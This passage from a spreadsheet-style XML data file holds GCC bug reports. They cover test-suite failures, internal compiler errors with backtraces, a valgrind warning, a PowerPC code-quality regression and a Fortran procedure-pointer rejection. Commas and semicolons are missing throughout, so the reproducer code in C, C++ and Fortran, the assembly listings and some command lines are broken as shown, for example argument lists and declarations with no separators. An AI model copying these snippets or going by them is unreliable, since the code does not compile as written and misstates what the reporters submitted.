FAIL: objc/execute/class-1.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/class-1.m execution  -O3 -g
FAIL: objc/execute/class-1.m execution  -Os
FAIL: objc/execute/class-10.m execution  -O2
FAIL: objc/execute/class-10.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/class-10.m execution  -O3 -g
FAIL: objc/execute/class-10.m execution  -Os
FAIL: objc/execute/class-11.m execution  -O2
FAIL: objc/execute/class-11.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/class-11.m execution  -O3 -g
FAIL: objc/execute/class-11.m execution  -Os
FAIL: objc/execute/class-12.m execution  -O2
FAIL: objc/execute/class-12.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/class-12.m execution  -O3 -g
FAIL: objc/execute/class-12.m execution  -Os
FAIL: objc/execute/class-13.m execution  -O2
FAIL: objc/execute/class-13.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/class-13.m execution  -O3 -g
FAIL: objc/execute/class-13.m execution  -Os
FAIL: objc/execute/class-14.m execution  -O2
FAIL: objc/execute/class-14.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/class-14.m execution  -O3 -g
FAIL: objc/execute/class-14.m execution  -Os
FAIL: objc/execute/class-2.m execution  -O2
FAIL: objc/execute/class-2.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/class-2.m execution  -O3 -g
FAIL: objc/execute/class-2.m execution  -Os
FAIL: objc/execute/class-3.m execution  -O2
FAIL: objc/execute/class-3.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/class-3.m execution  -O3 -g
FAIL: objc/execute/class-3.m execution  -Os
FAIL: objc/execute/class-4.m execution  -O2
(list pruned 279 unexpected fails where none previously)
With the message in the .log being for all or most:
objc runtime: cannot find class Object
*** EXIT code 4242
Last known to work on LAST_UPDATED: Thu Jun  9 10:30:36 UTC 2005.</t>
  </si>
  <si>
    <t>GCC-32024</t>
  </si>
  <si>
    <t>ICE - libgcc2.c:557: internal compiler error: in fold_checksum_tree at fold-const.c:12652</t>
  </si>
  <si>
    <t>The bootstrap hardly runs for a few minutes and then I get an ICE.
Screen output:
...
make[3]: Leaving directory `/opt/gcc-4_3-build/gcc'
mkdir -p -- i686-pc-linux-gnu/libgcc
Checking multilib configuration for libgcc...
Configuring stage 1 in i686-pc-linux-gnu/libgcc
configure: creating cache ./config.cache
...
checking whether decimal floating point is supported... yes
checking for __attribute__((visibility(hidden)))... yes
updating cache ./config.cache
configure: creating ./config.status
config.status: creating Makefile
config.status: executing default commands
make[3]: Entering directory `/opt/gcc-4_3-build/i686-pc-linux-gnu/libgcc'
# If this is the top-level multilib build all the other
# multilibs.
/opt/gcc-4_3-build/./gcc/xgcc -B/opt/gcc-4_3-build/./gcc/ -B/usr/i686-pc-linux-gnu/bin/ -B/usr/i686-pc-linux-gnu/lib/ -isystem /usr/i686-pc-linux-gnu/include -isystem /usr/i686-pc-linux-gnu/sys-include -g -fkeep-inline-functions -O2  -O2 -g -O2  -DIN_GCC    -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition  -isystem ./include  -fPIC -g -DHAVE_GTHR_DEFAULT -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED   -I. -I. -I../.././gcc -I/root/downloads/gcc-4_3-trunk/libgcc -I/root/downloads/gcc-4_3-trunk/libgcc/. -I/root/downloads/gcc-4_3-trunk/libgcc/../gcc -I/root/downloads/gcc-4_3-trunk/libgcc/../include -I/root/downloads/gcc-4_3-trunk/libgcc/../libdecnumber/bid -I/root/downloads/gcc-4_3-trunk/libgcc/../libdecnumber -I../../libdecnumber -o _muldi3.o -MT _muldi3.o -MD -MP -MF _muldi3.dep -DL_muldi3 -c /root/downloads/gcc-4_3-trunk/libgcc/../gcc/libgcc2.c \
          -fvisibility=hidden -DHIDE_EXPORTS
/root/downloads/gcc-4_3-trunk/libgcc/../gcc/libgcc2.c: In function '__muldi3':
/root/downloads/gcc-4_3-trunk/libgcc/../gcc/libgcc2.c:557: internal compiler error: in fold_checksum_tree at fold-const.c:12652
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [_muldi3.o] Error 1
make[3]: Leaving directory `/opt/gcc-4_3-build/i686-pc-linux-gnu/libgcc'
make[2]: *** [all-stage1-target-libgcc] Error 2
make[2]: Leaving directory `/opt/gcc-4_3-build'
make[1]: *** [stage1-bubble] Error 2
make[1]: Leaving directory `/opt/gcc-4_3-build'
make: *** [all] Error 2
# gcc/xgcc -v
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: /root/downloads/gcc-4_3-trunk/configure --verbose --enable-languages=cadac++fortranjavaobjcobj-c++ --with-tune=athlon-xp --prefix=/usr --enable-objc-gc --enable-concept-checks --disable-multilib --with-gxx-include-dir=/usr/include/c++/4.3 --enable-libstdcxx-debug --enable-static --enable-shared --enable-initfini-array --enable-__cxa_atexit --enable-threads=posix --enable-version-specific-runtime-libs --enable-libssp --enable-libmudflap --enable-libgomp --disable-werror --enable-nls --with-included-gettext --enable-decimal-float --with-long-double-128 --enable-debug --enable-java-gc=boehm --with-x --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --enable-java-awt=gtkxlib --enable-gtk-cairo --enable-qt-peer --enable-xmlj --enable-gconf-peer --enable-tool-wrappers --with-gjdoc --enable-portable-native-sync --enable-libgcj-multifile --with-stabs --enable-hash-synchronization --enable-gc-debug --enable-interpreter --with-system-zlib --enable-libada --with-tls --with-cpu=athlon-xp --with-arch=athlon-xp --enable-stage1-checking=assertfoldgcmiscrtlrtlflagruntimetree
Thread model: posix
gcc version 4.3.0 20070521 (experimental)
The _exact_ same ./configure commands work on gcc 4.2.0/1 (last few weeks).
I have saved a make screen output log (and the whole build directory).
No rush I'll play with 4.2.1 while I wait to see if this clears up.</t>
  </si>
  <si>
    <t>GCC-78743</t>
  </si>
  <si>
    <t>[6 Regression] g++ segfaults when printing warning for captured constexpr variable</t>
  </si>
  <si>
    <t>The following code will result in a segmentation fault when compiled with g++ version 6.2.0.
// --------------------------------------------------
static constexpr double foo = 10000.0
int main()
{
    auto foobar = [foo](){return (double)foo}
    return 0
}
// --------------------------------------------------
Example compile output from g++ test_crash.cpp:
test_crash.cpp: In function 'int main()':
test_crash.cpp:5:20: warning: capture of variable 'foo' with non-automatic storage duration
     auto foobar = [foo](){return (double)foo}
                    ^~~
'
Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Fixing the warning of course resolves the crash but also removing the constexpr:
// --------------------------------------------------
static double foo = 10000.0
int main()
{
    auto foobar = [foo](){return (double)foo}
    return 0
}
// --------------------------------------------------
Example output from g++ test_ok.cpp:
test_ok.cpp: In function 'int main()':
test_ok.cpp:5:20: warning: capture of variable 'foo' with non-automatic storage duration
     auto foobar = [foo](){return (double)foo}
                    ^~~
test_ok.cpp:1:15: note: 'double foo' declared here
 static double foo = 10000.0
               ^~~
GCC 6.2.0 was built with the following options:
Configured with: ../gcc-6.2.0/configure --prefix=/opt/plutotoolchain --target=i686-marel-linux-gnu --with-sysroot=/opt/pluto-targets/i386-rootfs/ --enable-languages=cc++ --enable-threads=posix --enable-shared --disable-multilib --enable-__cxa_atexit --disable-sjlj-exceptions --disable-nls --disable-decimal-float --disable-fixed-point --enable-checking=release --enable-symvers=gnu --enable-c99 --enable-long-long --enable-profile --with-system-zlib --with-default-libstdcxx-abi=gcc4-compatible --with-tune=intel</t>
  </si>
  <si>
    <t>bjarni.sigurdsson</t>
  </si>
  <si>
    <t>GCC-65624</t>
  </si>
  <si>
    <t>ICE in aarch64-builtins.c when expanding 4-argument aarch64 intrinsic.</t>
  </si>
  <si>
    <t>Created attachment 35178
Reprocase.
When testing cross toolchain for AArch64 on 32 bit host (i686) I ran to the such issue:
$ /home/m.ostapenko/jazz64/vd49_a5x/toolchain/aarch64-tizen/libexec/gcc/aarch64-tizen-linux-gnueabi/5.0.0/cc1 -quiet ref_vqdmlsl_lane.c -quiet -dumpbase ref_vqdmlsl_lane.c -march=armv8-a+simd -mlittle-endian -mabi=lp64 -auxbase-strip ref_vqdmlsl_lane.gccarm.o -g -Wall -Wno-unused-variable -Wno-unused-function -Wno-error=unused-local-typedefs -fshort-wchar -freport-bug
// In file included from ref_vqdmlal_lane.c:27:0
//                  from ref_vqdmlsl_lane.c:29:
// /home/m.ostapenko/jazz64/vd49_a5x/toolchain/aarch64-tizen/lib/gcc/aarch64-tizen-linux-gnueabi/5.0.0/include/arm_neon.h: In function 'exec_vqdmlsl_lane':
// /home/m.ostapenko/jazz64/vd49_a5x/toolchain/aarch64-tizen/lib/gcc/aarch64-tizen-linux-gnueabi/5.0.0/include/arm_neon.h:19165:10: internal compiler error: tree check: accessed operand 8 of call_expr with 7 operands in aarch64_simd_expand_args at config/aarch64/aarch64-builtins.c:915
//    return __builtin_aarch64_sqdmlsl_lanev4hi (__a __b __c __d)
//           ^
// 0x89b4948 tree_operand_check_failed(int tree_node const* char const* int char const*)
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/tree.c:9507
// 0x8a3c9f9 tree_operand_check
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/tree.h:3346
// 0x8a3c9f9 aarch64_simd_expand_args
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/config/aarch64/aarch64-builtins.c:915
// 0x8a3c9f9 aarch64_simd_expand_builtin(int tree_node* rtx_def*)
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/config/aarch64/aarch64-builtins.c:1075
// 0x828256b expand_builtin(tree_node* rtx_def* rtx_def* machine_mode int)
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/builtins.c:5967
// 0x83a3bb0 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/expr.c:10489
// 0x83b0ce6 store_expr_with_bounds(tree_node* rtx_def* int bool tree_node*)
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/expr.c:5385
// 0x83b37c9 expand_assignment(tree_node* tree_node* bool)
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/expr.c:5154
// 0x82a9a6e expand_call_stmt
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/cfgexpand.c:2397
// 0x82a9a6e expand_gimple_stmt_1
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/cfgexpand.c:3343
// 0x82a9a6e expand_gimple_stmt
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/cfgexpand.c:3497
// 0x82aaf80 expand_gimple_basic_block
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/cfgexpand.c:5509
// 0x82ad761 execute
// &gt;----/home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/gcc/cfgexpand.c:6127
// Please submit a full bug report
// with preprocessed source if appropriate.
// Please include the complete backtrace with any bug report.
// See  for instructions.
Looking to the GCC source code (aarch64_simd_expand_builtin function) I've noticed that all arguments and return value types are stored to args[SIMD_MAX_BUILTIN_ARGS] array. In aarch64_simd_expand_builtin we also write special SIMD_ARG_STOP indicator to this array after all arguments. But if we have 4-argument intrinsic with return value we will overflow args[SIMD_MAX_BUILTIN_ARGS] with SIMD_ARG_STOP since SIMD_MAX_BUILTIN_ARGS is defined as 5. I'm attaching preprocessed reprocase and trivial fix.
max@max:~/build$ aarch64-tizen-linux-gnueabi-gcc -v
// Configured with: /home/m.ostapenko/jazz64/vd49_a5x/toolchain/build/sources/gcc_1/configure --build=i686-pc-linux-gnu --host=i686-pc-linux-gnu --target=aarch64-tizen-linux-gnueabi --prefix=/home/m.ostapenko/jazz64/vd49_a5x/toolchain/aarch64-tizen --with-sysroot=/home/m.ostapenko/jazz64/vd49_a5x/toolchain/aarch64-tizen/aarch64-tizen-linux-gnueabi/sys-root --disable-libmudflap --enable-libssp --disable-nls --disable-libstdcxx-pch --disable-multilib --disable-gnu-unique-object --enable-linker-build-id --with-arch=armv8-a --enable-libgomp --enable-poison-system-directories --enable-long-long --enable-threads --enable-languages=cc++fortran --enable-shared --enable-lto --enable-symvers=gnu --enable-__cxa_atexit --with-gnu-as --with-gnu-ld --with-host-libstdcxx='-static-libgcc -Wl-Bstatic-lstdc++-Bdynamic -lm' --with-build-time-tools=/home/m.ostapenko/jazz64/vd49_a5x/toolchain/aarch64-tizen/bin --with-gmp=/home/m.ostapenko/jazz64/vd49_a5x/toolchain/aarch64-tizen --with-mpfr=/home/m.ostapenko/jazz64/vd49_a5x/toolchain/aarch64-tizen --with-libelf=/home/m.ostapenko/jazz64/vd49_a5x/toolchain/aarch64-tizen
// Thread model: posix
// gcc version 5.0.0 20150325 (experimental) (VDLinux.v8a5x.GA1.2015-03-31)</t>
  </si>
  <si>
    <t>GCC-29581</t>
  </si>
  <si>
    <t>Latent bug in 4.1/4.2/4.3 lambda-code.c</t>
  </si>
  <si>
    <t>SUBROUTINE FOO (K)
      INTEGER I J K A(55) B
      COMMON A
      A(11) = 1
 10   B = 0
      DO 30 I = 1 K
        DO 20 J = 1 K
          B = B + A(IJ)
 20     CONTINUE
        A(II) = A(II) * 2
 30   CONTINUE
      IF (B.GE.3) RETURN
      GO TO 10
      END SUBROUTINE
      PROGRAM BAR
        CALL FOO (2)
      END
is miscompiled on redhat/gcc-4_1-branch with -O2 -ftree-loop-linear
I believe on all arches tested at least ppc -m32 and x86_64 -m64.
Unfortunately I couldn't reproduce this on gcc-4_1-branch nor on the
trunk because the statements coming from earlier passes
are slightly different though IMHO valid in all 3 cases while what
-ftree-loop-linear creates is clearly invalid.  I believe it is a latent
bug in lambda-code.c (see below) although I don't have any testcases
that would prove it on non-vendor branches.
All vars used in foo are int4 the body in *.empty is on
redhat/gcc-4_1-branch:
:
  __BLNK__.a[0] = 1
  D.684_14 = *k_13
  goto  ()
__label_000010:
:
  if (D.684_14 &gt; 0) goto  else goto __label_000010
:
  # b_5 = PHI 
  # i_1 = PHI 
:
  pretmp.29_7 = i_1 + -6
  # j_9 = PHI 
  # b_6 = PHI 
:
  D.697_29 = j_9 * 5
  D.698_30 = pretmp.29_7
  D.699_31 = pretmp.29_7 + D.697_29
  D.700_32 = __BLNK__.a[D.699_31]
  b_33 = D.700_32 + b_6
  j_35 = j_9 + 1
  if (j_9 == D.684_14) goto  else goto 
:
  goto  ()
  # b_37 = PHI 
:
  D.701_18 = i_1 * 5
  D.702_19 = pretmp.29_7
  D.703_20 = pretmp.29_7 + D.701_18
  D.704_24 = __BLNK__.a[D.703_20]
  D.705_25 = D.704_24 * 2
  __BLNK__.a[D.703_20] = D.705_25
  if (i_1 == D.684_14) goto  else goto 
:
  i_28 = i_1 + 1
  goto  ()
  # b_8 = PHI 
:
  if (b_8 &gt; 2) goto __return_foo else goto __label_000010
__return_foo:
  return
On gcc-4_1-branch the difference is just that pretmp.29_7 doesn't
exist all users of that have i_1 + -6 instead.  On the trunk
pretmp var is only used in the innermost loop (L3..L30) and after
L8 label it instead uses i_1 * 6 + -6.  Now -ftree-loop-linear
on the above determines the L3..L30 loop isn't perfectly
nested in L25..L31 but can_convert_to_perfect_nest says it can
be converted to perfect nest because the pretmp.9_7 = i_1 + -6
satisfies:
                  /* If the IV is simple it can be duplicated.  */
                  if (!automatically_generated_chrec_p (scev))
                    {
                      tree step = evolution_part_in_loop_num (scev loop-&gt;num)
                      if (step &amp;&amp; step != chrec_dont_know
                          &amp;&amp; TREE_CODE (step) == INTEGER_CST)
                        continue
                    }
-ftree-loop-linear then changes the loops so that the b computation
is done using 2 nested loops and the *2 multiplication in a separate
loop.  Unfortunately it doesn't compute the start of the loop
correctly above the first __BLKN__.a[] that is multiplied by 2 is
pretmp.29_7 + i_1 * 5 = i_1 * 6 - 6 where i_1 starts at 1
but after the transformation it is perfectiv.32_12 * 5 + perfectiv.32_12:
...
  # perfectiv.32_12 = PHI 
:
:
  uboundvar.33_40 = D.684_14 + 1
  perfectiv.32_39 = perfectiv.32_12 + 1
  D.701_18 = perfectiv.32_12 * 5
  D.702_19 = perfectiv.32_12
  D.703_20 = perfectiv.32_12 + D.701_18
  D.704_24 = __BLNK__.a[D.703_20]
  D.705_25 = D.704_24 * 2
  __BLNK__.a[D.703_20] = D.705_25
  if (uboundvar.33_40 &gt;= perfectiv.32_39) goto  else goto 
:
  goto  ()
can_convert_to_perfect_nest only looks at evolution part of the scev:
              if (TREE_CODE (stmt) == MODIFY_EXPR)
                {
                  use_operand_p use_a use_b
                  imm_use_iterator imm_iter
                  ssa_op_iter op_iter op_iter1
                  tree op0 = TREE_OPERAND (stmt 0)
                  tree scev = instantiate_parameters
                    (loop analyze_scalar_evolution (loop op0))
                  /* If the IV is simple it can be duplicated.  */
                  if (!automatically_generated_chrec_p (scev))
                    {
                      tree step = evolution_part_in_loop_num (scev loop-&gt;num)
                      if (step &amp;&amp; step != chrec_dont_know
                          &amp;&amp; TREE_CODE (step) == INTEGER_CST)
                        continue
                    }
and replace_uses_equiv_to_x_with_y happily replaces vars with the perfectiv
if the evolution part of the scev is constant and equal to the loop step:
static void
replace_uses_equiv_to_x_with_y (struct loop *loop tree stmt tree x
                                int xstep tree y)
{
  ssa_op_iter iter
  use_operand_p use_p
  FOR_EACH_SSA_USE_OPERAND (use_p stmt iter SSA_OP_USE)
    {
      tree use = USE_FROM_PTR (use_p)
      tree step = NULL_TREE
      tree scev = instantiate_parameters (loop
                                          analyze_scalar_evolution (loop use))
      if (scev != NULL_TREE &amp;&amp; scev != chrec_dont_know)
        step = evolution_part_in_loop_num (scev loop-&gt;num)
      if ((step &amp;&amp; step != chrec_dont_know
           &amp;&amp; TREE_CODE (step) == INTEGER_CST
           &amp;&amp; int_cst_value (step) == xstep)
          || USE_FROM_PTR (use_p) == x)
        SET_USE (use_p y)
    }
}
For USE_FROM_PTR (use_p) == x that's fine and if
i1 = initial_condition_in_loop_num (scev loop-&gt;num) is equal to
i2 = initial_condition_in_loop_num (instantiate_parameters (loop analyze_scalar_evolution (loop x)))
value of y that's fine too.  But if it is not I believe we need to
replace use with y + i1 - i2.
In the testcase I posted USE's initial_condition_in_loop_num is
-5 and X's initial_condition_in_loop_num is 1.  And adding -5 - 1
to perfectiv (aka Y in the above routine) is exactly what would
cure this testcase.
Do you agree with this?
Not sure how hard is that though other alternative would be to make
can_convert_to_perfect_nest more conservative.</t>
  </si>
  <si>
    <t>GCC-40891</t>
  </si>
  <si>
    <t>[4.4 Regression] Revision 150143 failed gcc.dg/cdce[12].c</t>
  </si>
  <si>
    <t>Revision 150143:
http://gcc.gnu.org/ml/gcc-cvs/2009-07/msg01026.html
caused:
FAIL: gcc.dg/cdce1.c scan-tree-dump cdce cdce1.c:16: note: function call is shrink-wrapped into error conditions.
FAIL: gcc.dg/cdce2.c scan-tree-dump cdce cdce2.c:16: note: function call is shrink-wrapped into error conditions.
on Linux/ia32 Linux/ia64 and Linux/Intel64.</t>
  </si>
  <si>
    <t>GCC-64003</t>
  </si>
  <si>
    <t>valgrind complains about get_attr_length_nobnd in insn-attrtab.c from i386.md</t>
  </si>
  <si>
    <t>Created attachment 34057
Reproducer
When I run the jit testsuite under valgrind I consistently see reports from here:
Conditional jump or move depends on uninitialised value(s)
   at 0x5721AED: get_attr_length_nobnd(rtx_insn*) (i386.md:6236)
   by 0x5715F3A: insn_min_length(rtx_insn*) (i386.md:510)
   by 0x4F4BE0A: shorten_branches(rtx_insn*) (final.c:1208)
   by 0x4F52A5A: rest_of_handle_shorten_branches() (final.c:4567)
   by 0x4F52AAE: (anonymous namespace)::pass_shorten_branches::execute(function*) (final.c:4596)
   by 0x522354D: execute_one_pass(opt_pass*) (passes.c:2306)
   by 0x52237C4: execute_pass_list_1(opt_pass*) (passes.c:2358)
   by 0x52237F5: execute_pass_list_1(opt_pass*) (passes.c:2359)
   by 0x52237F5: execute_pass_list_1(opt_pass*) (passes.c:2359)
   by 0x5223832: execute_pass_list(function* opt_pass*) (passes.c:2369)
   by 0x4E4884F: cgraph_node::expand() (cgraphunit.c:1773)
   by 0x4E48EE9: expand_all_functions() (cgraphunit.c:1909)
I can reproduce this with cc1 with the attached file at -O2 and above:
  valgrind ./cc1 get-attr-length-i386.c -O2
This is with r217427 on x86_64-unknown-linux-gnu configuring with:
 --enable-valgrind-annotations 
Turning off the writing of #line directives in read-md.c shows that it's at line 18500 of the generated insn-attrtab.c:
==5819==    at 0xD952E2: get_attr_length_nobnd(rtx_insn*) (insn-attrtab.c:18500)
somewhere within this monster conditional:
 18493  int
 18494  get_attr_length_nobnd (rtx_insn *insn ATTRIBUTE_UNUSED)
 18495  {
 18496    switch (recog_memoized (insn))
 18497      {
 18498      case 610:  /* *jcc_1 */
 18499        extract_insn_cached (insn)
&gt;18500        if ((((INSN_ADDRESSES_SET_P () ? INSN_ADDRESSES (INSN_UID (GET_CODE (operands[0]) == LABEL_REF ? XEXP (operands[0] 0) : operands[0])) : 0) - (insn_current_reference_address (insn))) &gt;= (-126)) &amp;&amp; (((INSN_ADDRESSES_SET_P () ? INSN_ADDRESSES (INSN_UID (GET_CODE (operands[0]) == LABEL_REF ? XEXP (operands[0] 0) : operands[0])) : 0) - (insn_current_reference_address (insn))) &lt; (128)))</t>
  </si>
  <si>
    <t>GCC-45051</t>
  </si>
  <si>
    <t>[4.6 Regression]: gcc.c-torture/execute/builtins/abs-2.c and abs-3.c due to track subwords of DImode allocnos</t>
  </si>
  <si>
    <t>With revision 162417 this test passed.
From revision 162418 and on these tests (or this test as abs-3.c is effectively the same as abs-2.c) has failed as follows:
Running /tmp/badabs/gcc/gcc/testsuite/gcc.c-torture/execute/builtins/builtins.exp ...
FAIL: gcc.c-torture/execute/builtins/abs-2.c execution  -O2 
FAIL: gcc.c-torture/execute/builtins/abs-2.c execution  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/builtins/abs-2.c execution  -O3 -g 
FAIL: gcc.c-torture/execute/builtins/abs-2.c execution  -Os 
FAIL: gcc.c-torture/execute/builtins/abs-2.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/builtins/abs-2.c execution  -O2 -fwhopr 
FAIL: gcc.c-torture/execute/builtins/abs-3.c execution  -O2 
FAIL: gcc.c-torture/execute/builtins/abs-3.c execution  -O3 -fomit-frame-pointer 
FAIL: gcc.c-torture/execute/builtins/abs-3.c execution  -O3 -g 
FAIL: gcc.c-torture/execute/builtins/abs-3.c execution  -Os 
FAIL: gcc.c-torture/execute/builtins/abs-3.c execution  -O2 -flto 
FAIL: gcc.c-torture/execute/builtins/abs-3.c execution  -O2 -fwhopr 
With the message in the logfile being:
...
PASS: gcc.c-torture/execute/builtins/abs-2.c compilation  -O2 
program stopped with signal 6.
FAIL: gcc.c-torture/execute/builtins/abs-2.c execution  -O2 
...
(i.e. abort being called)
Author of patch in suspect revision range CC:ed.
At a glance the code change causes a register containing 0 to be used as containing 0xffffffff for the low-part of 9223372036854775807LL ((1&lt;&lt;63)-1) i.e. a mis-tracking of a DImode subreg.
I'll attach a smaller test-case and an assembly diff pointing out the wrong code.</t>
  </si>
  <si>
    <t>GCC-4099</t>
  </si>
  <si>
    <t>Failed to make libmath</t>
  </si>
  <si>
    <t>Making all in libmath
make[4]: Entering directory `/a/warplan/wsproj/sne/wbeebe/gcc-3.0.1/objdir/sparc-sun-solaris2.7/libstdc++-v3/libmath'
/bin/sh ../libtool --mode=compile /wsproj/sne/wbeebe/gcc-3.0.1/objdir/gcc/xgcc -B/wsproj/sne/wbeebe/gcc-3.0.1/objdir/gcc
/ -B~/gnu/sparc-sun-solaris2.7/bin/ -B~/gnu/sparc-sun-solaris2.7/lib/ -isystem ~/gnu/sparc-sun-solaris2.7/include -DHAVE
_CONFIG_H -I. -I../../../../libstdc++-v3/libmath -I..      -g -O2 -c ../../../../libstdc++-v3/libmath/signbit.c
libtool: compile: unable to infer tagged configuration
libtool: compile: specify a tag with `--tag'
make[4]: *** [signbit.lo] Error 1
make[4]: Leaving directory `/a/warplan/wsproj/sne/wbeebe/gcc-3.0.1/objdir/sparc-sun-solaris2.7/libstdc++-v3/libmath'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/a/warplan/wsproj/sne/wbeebe/gcc-3.0.1/objdir/sparc-sun-solaris2.7/libstdc++-v3'
make[2]: *** [all-recursive-am] Error 2
make[2]: Leaving directory `/a/warplan/wsproj/sne/wbeebe/gcc-3.0.1/objdir/sparc-sun-solaris2.7/libstdc++-v3'
make[1]: *** [all-target-libstdc++-v3] Error 2
make[1]: Leaving directory `/a/warplan/wsproj/sne/wbeebe/gcc-3.0.1/objdir'
make: *** [bootstrap] Error 2
Release:
3.0.1
Environment:
Sunos 5.7 Generic_106541-16 sun4u sparc SUN2 Ultra5_10</t>
  </si>
  <si>
    <t>bill_beebe</t>
  </si>
  <si>
    <t>GCC-40164</t>
  </si>
  <si>
    <t>Fortran 2003: Arrays of procedure pointers (using PPCs)</t>
  </si>
  <si>
    <t>PROGRAM test_prog
 TYPE ProcPointerArray
   PROCEDURE(add) POINTER NOPASS :: f
 END TYPE ProcPointerArray
 TYPE (ProcPointerArray) :: f_array(1)
 PROCEDURE(add) POINTER :: f
 f_array(1)%f =&gt; add
 f =&gt; f_array(1)%f
 PRINT* f(2.4.)
CONTAINS
 FUNCTION add(ab) RESULT(sum)
   REAL INTENT(in) :: a b
   REAL :: sum
   sum = a + b
 END FUNCTION add
END PROGRAM test_prog
This produces the error
 f =&gt; f_array(1)%f
                1
Error: VARIABLE attribute of 'f_array' conflicts with PROCEDURE attribute at (1)
Reported by Barron Bichon.</t>
  </si>
  <si>
    <t>GCC-27747</t>
  </si>
  <si>
    <t>[4.2 Regression] ice _Pragma and macros</t>
  </si>
  <si>
    <t>Testcase:
#define push _Pragma (pack(push))
#define push1 _Pragma (pack(push))
push1
------------------------------------------------------------------
This ICEs like:
pc64:~&gt; ~/newtest/bin/gcc t.c
t.c:4: internal compiler error: in c_parser_consume_token at c-parser.c:639
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I will file a different bug for C++ since it is rejected there instead.</t>
  </si>
  <si>
    <t>GCC-83792</t>
  </si>
  <si>
    <t>[openacc] Factor out async argument utility functions</t>
  </si>
  <si>
    <t>The use of enum acc_async_t in libgomp is hard to understand.
In order to understand what this means:
...
if (async &lt; acc_async_noval)
...
you need to know the names and values of the enum.
Using factored out functions we get something that is easier to understand:
...
if (async_synchronous_p (async))
...</t>
  </si>
  <si>
    <t>GCC-46854</t>
  </si>
  <si>
    <t>PowerPC optimization regression</t>
  </si>
  <si>
    <t>I have noticed gcc 4.4.5 often produces less optimzed code
than the old 3.4.6. Below is the latest example. I am
starting to wonder if I need rebuild gcc 4.4.5 and/or
add new options to gcc when I compile. Any insight?
 Jocke
const char *test(int i)
{
	const char *p = abc\0def\0gef
	for( i --i)
		while(*++p)
	return p
}
/* gcc 4.4.5 -O2 -S
       .section        .text
        .align 2
        .globl test
        .type   test @function
test:
        mr. 03
        mtctr 0
        beq- 0.L10
        lis 3.LANCHOR0@ha
        la 3.LANCHOR0@l(3)
.L8:
        lbzu 01(3)
        cmpwi 700
        bne+ 7.L8
        bdnz .L8
        blr
.L10:
        lis 3.LANCHOR0@ha
        la 3.LANCHOR0@l(3)
        blr
        .size   test .-test
        .section        .rodata
        .align 2
        .set    .LANCHOR0. + 0
.LC0:
        .string abc
        .string def
        .string gef
        .ident  GCC: (Gentoo 4.4.5 p1.0 pie-0.4.5) 4.4.5
 */
/* gcc 4.4.5 -Os -S
.globl test
        .type   test @function
test:
        mr 93
        lis 3.LANCHOR0@ha
        la 3.LANCHOR0@l(3)
        b .L2
.L5:
        lbzu 01(3)
        cmpwi 700
        bne+ 7.L5
        addi 99-1
.L2:
        cmpwi 790
        bne+ 7.L5
        blr
        .size   test .-test
        .section        .rodata
        .set    .LANCHOR0. + 0
.LC0:
        .string abc
        .string def
        .string gef
        .ident  GCC: (Gentoo 4.4.5 p1.0 pie-0.4.5) 4.4.5
 */
/* gcc 3.4.6 -Os -S and gcc -O2 -S
section        .rodata
        .align 2
.LC0:
        .string abc
        .string def
        .string gef
        .section        .text
        .align 2
        .globl test
        .type   test @function
test:
        mr. 03
        lis 9.LC0@ha
        la 3.LC0@l(9)
        mtctr 0
        beqlr- 0
.L13:
        lbzu 01(3)
        cmpwi 700
        bne- 7.L13
        bdnz .L13
        blr
        .size   test .-test
        .section        .note.GNU-stack@progbits
        .ident  GCC: (GNU) 3.4.6 (Gentoo 3.4.6-r2 ssp-3.4.6-1.0 pie-8.7.9)
*/</t>
  </si>
  <si>
    <t>GCC-29424</t>
  </si>
  <si>
    <t>FAIL: events output</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.2/objdir/hppa-linux/libjava/testsuite/../lib
tool --silent --tag=GCJ --mode=link /home/dave/gcc-4.2/objdir/gcc/gcj -B/home/da
ve/gcc-4.2/objdir/hppa-linux/libjava/ -B/home/dave/gcc-4.2/objdir/gcc/ --encodin
g=UTF-8 -B/home/dave/gcc-4.2/objdir/hppa-linux/libjava/testsuite/../ /home/dave/
gcc-4.2/gcc/libjava/testsuite/libjava.jvmti/events.java natevents.o   -no-instal
l --main=events -g  -L/home/dave/gcc-4.2/objdir/hppa-linux/./libjava/.libs -lm
